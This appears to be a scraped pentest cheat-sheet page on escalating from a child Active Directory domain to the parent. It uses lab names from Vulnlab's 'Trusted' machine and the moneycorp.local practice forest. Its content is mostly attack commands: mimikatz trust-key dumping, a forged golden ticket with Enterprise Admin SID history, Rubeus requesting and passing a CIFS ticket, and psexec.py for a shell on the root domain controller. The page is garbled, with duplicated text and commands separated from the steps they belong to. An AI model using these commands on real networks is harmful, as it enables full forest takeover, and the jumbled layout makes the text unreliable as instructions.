Child-to-Parent CIFS
For long version refer this article Refer Trusted- Vulnlab for example To get Domain SID:
lsadump::trust /patchThen
Use the SID and rc4 hash:
Now use Rubeus to get TGS:
Then to get shell:
Last updated
Was this helpful?
For long version refer this article Refer Trusted- Vulnlab for example To get Domain SID:
lsadump::trust /patchThen
Use the SID and rc4 hash:
Now use Rubeus to get TGS:
Then to get shell:
Last updated
Was this helpful?
Was this helpful?
Kerberos::golden
/user: Administrator
/domain: dollarcorp.moneycorp.local [child_domain]
/sid: DomainAdmin_SID [-512]
/sids: Enterprise_Admin_SID [519]
/rc4: Ticket HASH
/service:krbtgt
/target:moneycorp.local [root domain]
/ticket: location to save the ticketRubeus.exe asktgs
/ticket: ticket Location
/service: service type [cifs/mcorpdc.moneycorp.local]
/dc: domain controller [mcorp-dc.moneycorp.local]
/pttpsexec.py administrator@trusteddc.trusted.vl -k -no-pass